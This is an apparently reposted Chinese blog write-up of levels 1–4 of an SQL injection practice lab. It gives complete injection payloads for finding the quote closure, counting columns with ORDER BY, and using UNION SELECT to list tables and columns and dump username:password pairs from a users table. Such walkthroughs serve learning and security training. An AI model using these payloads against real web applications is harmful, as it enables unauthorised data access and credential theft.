本文共 2185 字，大约阅读时间需要 7 分钟。

The first

第一步：判断闭合符号，输入单引号，看看是否报错，这里就报错了，当然注释符有好多种（'、"、#、--+）这里输入单引号就行了，报错了。

根据报错信息，可以确定输入参数的内容被存放到一对单引号中间。这里我很迷，到了第二关，也是报错，先不说，就是有没有人懵逼这个报错怎么看是不是需要单引号？？是什么类型的注入？？？和我一样的新手看到这里不懂请自动忽略，等到第二关再回来看，就会明白了，这个依据就是：你仔细看第一关和第二关的第一步报错对比一下，认真看，看看是不是第一张图片那个LIMIT前面那个1两边是有双引号的，第二张图就没有。仔细品😎😎😎 输入：

?id=1'

第二步：判断列数用order by语句 输入：

?id=1' order by 1--+

然后把1换成2，再换成3，判断下去，直到报错为止。依次判断，这里是到4，报错。 （附图作参考，如果没有出现这个页面，那么就是SQL语句输入错误，检查语句。） 第三步：联合注入爆数据库令 id=非正确值,这里我使id=0。 至于为什么？哪有呢么多为什么、我也不知道，hhh🤣🤣🤣

?id=0' union select 1,2,database()--+

这里，database()放在2或者3的位置都可以，注意，如果放在2的位置上的话，后面的3不能丢，这个错误很容易犯，所以，我就放在3的位置上，这样也不会忘。😂😂 第四步：爆数据表

?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

显然users是用户数据表，为什么？单词告诉我的，那三个像吗？就算猜也要给我猜这个！😎😎😎 第五步：爆字段

?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

看到了，那么大的username，password😁😁

最最最后一步了，爆值：

?id=0' union select 1,2,group_concat(username,0x3a,password) from users--+

0x3a意思是“:”

这都是哈哈哈，恭喜通关！✌✌✌✌

The second

第一步：还是先判断有无闭合符号，然后输入?id=1'

根据报错信息确定输入的内容被带入到数据库中，也可叫做数字型注入。懵逼了没，为什么？怎么看出来的？跟第一关有什么不同？再回过头去看看文章开头第一关那里能不能看出来就靠自己了，反正我是看懂了，hhh 跟第一关的步骤一样，只是，不再需要这个'单引号了。 就不再重复了，我把结果放出来吧，证明是可行的。😜😜😜

The third

第三关和前面一样，只是闭合符号又不一样这次的是,看圆括号

好了，其他还是跟上面一样，不说了，太困了，啊啊！睡觉，，今天又熬夜了，心疼我的头发，害！！对了，留一张图，证明我来过。。。。。 晚安，来不及回首说拜拜。

---

上面是一条华丽的分界线,进行下一关

The fourth

第一步仍然是判断闭合符号，先判断单引号

没有报错。那就不是，再试双引号 报错，根据报错信息判断出输入的内容被放到一对双引号和圆括号中啦。 接下来就该判断列数，

?id=1") order by 1--+

还是到4报错了，

到这里，不判断他的数据库名来试试，直接爆表名，（我看其他博主的博客有这么做的，我也来试试，省去爆库的步骤了）

?id=0") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

哇！真的可以。 解释一下哈，刚没有爆库名，所以我不知道在哪个库里面，然后，我把语句改成这样啦where table_schema=database()就是从table_schema=database(),这个库里直接爆表，也是可以的。目前刚了解到，还是先老老实实的爆先爆库名。 继续继续hhh，爆列：

?id=0") union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

跟前几关一样了

最后爆值，

?id=0") union select 1,group_concat(username,0x3a,password),3 from users--+

OK，收工~

学习感受：感觉emmmmmm, 非常有趣，说实话，我是个笨蛋，没别人记得快，我做了好多遍才记住这个步骤的，做的时候呢…忘这忘那的，很粗心，做不好又非常着急，特别容易紧张，脑子就不知道怎么想了。不过我并不比别人差，说不定他们也是练得比较多，付出的努力更多呢。而且我对这个很感兴趣，都说兴趣是最好的老师，付出肯定会得到回报，给自己喊句奥利给！！！

转载地址：http://ppshz.baihongyu.com/